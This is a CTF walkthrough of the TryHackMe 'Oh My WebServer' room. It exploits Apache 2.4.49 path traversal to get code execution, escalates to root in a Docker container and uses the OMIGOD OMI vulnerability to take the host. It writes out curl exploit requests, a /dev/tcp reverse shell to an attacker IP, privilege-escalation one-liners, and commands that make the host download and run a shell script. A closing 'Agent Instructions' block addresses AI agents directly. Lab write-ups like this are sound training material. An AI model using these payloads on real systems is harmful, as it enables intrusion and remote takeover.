# Oh My WebServer ## Nmap ``` nmap 10.10.170.23 -p- -Pn -sS -sV PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.49 ((Unix)) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` Starting out on port 80 we arrive at the root page for CONSUULT. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FmEIxlIEALhDIeoCZNAAs%2Fimage.png?alt=media\&token=8f6fcbf8-6774-4bd3-b179-0703629638ed) Running a web application scan with `Nessus` against the target web server shows the running version of Apache is vulnerable to a critical exploit. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FXN28MiDIZ6IQcfI8htdf%2Fimage.png?alt=media\&token=3d15336b-1af3-4d53-bc9f-85e7ec0f8d0f) More details regarding the Path Traversal vulnerability are show below. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FsVlTuIMoocIqiHqMGhva%2Fimage.png?alt=media\&token=5b3d0ca4-83d2-405b-ae00-3d9075af382a) Researching publicly available exploits we find a bash script available on Exploit-db. **Exploit-db:** ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F2xpdf0LuK5xtDzIuQHCq%2Fimage.png?alt=media\&token=bff52810-af3c-4caa-ac29-2b895df0f5b1) We can take the main part of the script into single command in order to exploit the target system as shown below; we are able read the contents of `/etc/passwd`. ``` curl -s --path-as-is -d "echo Content-Type: text/plain; echo; /etc/passwd" "http://10.10.157.208/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh" ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FGxuAhXlwkHCBiLbLEC6I%2Fimage.png?alt=media\&token=47628339-6edc-4521-9268-89fc8cfb5c79) To perform easier exploitation we can send the curl request through a local proxy (burpsuite) in order to capture the request. ``` curl -x localhost:8080 -s --path-as-is -d "echo Content-Type: text/plain; echo; " "http://10.10.82.103/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash" ``` ``` POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash HTTP/1.1 Host: 10.10.82.103 User-Agent: curl/7.82.0 Accept: */* Content-Length: 52 Content-Type: application/x-www-form-urlencoded Connection: close echo Content-Type: text/plain; echo; cat /etc/passwd ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F2H1TJH19sVuaSrHUCF8s%2Fimage.png?alt=media\&token=b3dcd181-057d-43b7-a64a-29179b01048d) We can manipulate this request to receive a reverse shell. ``` POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash HTTP/1.1 Host: 10.10.82.103 User-Agent: curl/7.82.0 Accept: */* Content-Length: 77 Content-Type: application/x-www-form-urlencoded Connection: close echo Content-Type: text/plain; echo; sh -i >& /dev/tcp/10.8.239.254/4444 0>&1 ``` As shown below: ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FMmr51shHfQhZFbYdDdpQ%2Fimage.png?alt=media\&token=c91b53dc-3d08-4733-877c-59fb2a9551cd) From here we find python3 is running on the target system, as such we spawn a python3 shell. ``` /usr/bin/python3 -c 'import pty; pty.spawn("/bin/bash")' ``` Performing basic enumeration on the target system we find the IP of the system does not match that of the room. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FbSPxsHI4fTyHPT5ad8y7%2Fimage.png?alt=media\&token=5aae1ffb-096f-4841-bfa7-b1c1fa1d0202) We also find a pretty telling `.dockerenv` file in `/`. These facts combined with the system hostname, we can safely assume we are working within a docker container. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FqRZQhScG22lcValF3AwW%2Fimage.png?alt=media\&token=39b6dbfa-7ea1-482e-8afa-4f33b5abb0e3) For further enumeration `linpeas.sh` was downloaded onto the target system. ``` curl http://10.8.239.254/linpeas.sh --output linpeas.sh ``` After executing `linpeas.sh` we see that the current user has the ability to escalate privileges through capabilities set for `python3.7`. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FbNZdcGb1f7fQaiQ8xqWc%2Fimage.png?alt=media\&token=f35757c6-2742-4d2c-965d-babc728d47b7) The following command can be used to escalate to **root** within the docker container. ``` /usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/sh")' ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FID5PvFyNPTNPg6FNfRDd%2Fimage.png?alt=media\&token=dbf14ce9-1bd1-419d-bf5b-860443b063fe) From here, we are able to grab the `user.txt` flag from `/root/`. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FwNlb6gnpb8UkPrVrthWP%2Fimage.png?alt=media\&token=c5ea3f24-aec7-49c8-9cb4-668c4b48f243) For further enumeration a static `Nmap` binary was uploaded to the target system. **Github:** ``` ./nmap 172.17.0.1 -p 1-10000 -sS -v ``` As the current container is running on 172.17.0.2 we check 172.17.0.1 which, we find is running something on port 5986. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FdYbloQpHhn3GoZ4k1UyO%2Fimage.png?alt=media\&token=2a7d2bf9-07f3-4f0b-a4a7-cbc31c250524) ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FnSmKaoksH1rp618zwxfj%2Fimage.png?alt=media\&token=677bd406-8912-4ddd-bb47-5c51864d5972) Researching the port number we find that "OMI is an [open-source](https://github.com/microsoft/omi) remote configuration management tool developed by Microsoft." According to the resource linked below this may be vulnerable to CVE-2021-38647, which could allow use to perform remote code execution on the host 172.17.0.1. **BookHackTricks:** **CVE:** **Blog:** **GitHub:** Download the Github python script from above onto the target system. ``` curl http://10.8.239.254/omigod.py --output omigod.py ``` Test for command execution: ``` python3 omigod.py -t 172.17.0.1 -c hostname ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FyZUYnSGv3dMwYNthbmy5%2Fimage.png?alt=media\&token=cbc99415-2ec2-4163-90eb-9ac11f7b1d8a) We can then create a bash reverse shell file "shell.sh" and perform RCE on the 172.17.0.1 system to download and execute from our attacking host. ``` python3 omigod.py -t 172.17.0.1 -c "curl http://10.8.239.254/shell.sh --output /tmp/shell.sh" python3 omigod.py -t 172.17.0.1 -c "bash /tmp/shell.sh" ``` Giving us a root shell on the main host. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F9c3RsejVHe0x0g56BErk%2Fimage.png?alt=media\&token=d5391c65-48b3-485e-8d7c-93630d0ca730) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://viperone.gitbook.io/pentest-everything/writeups/tryhackme/linux/oh-my-webserver.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.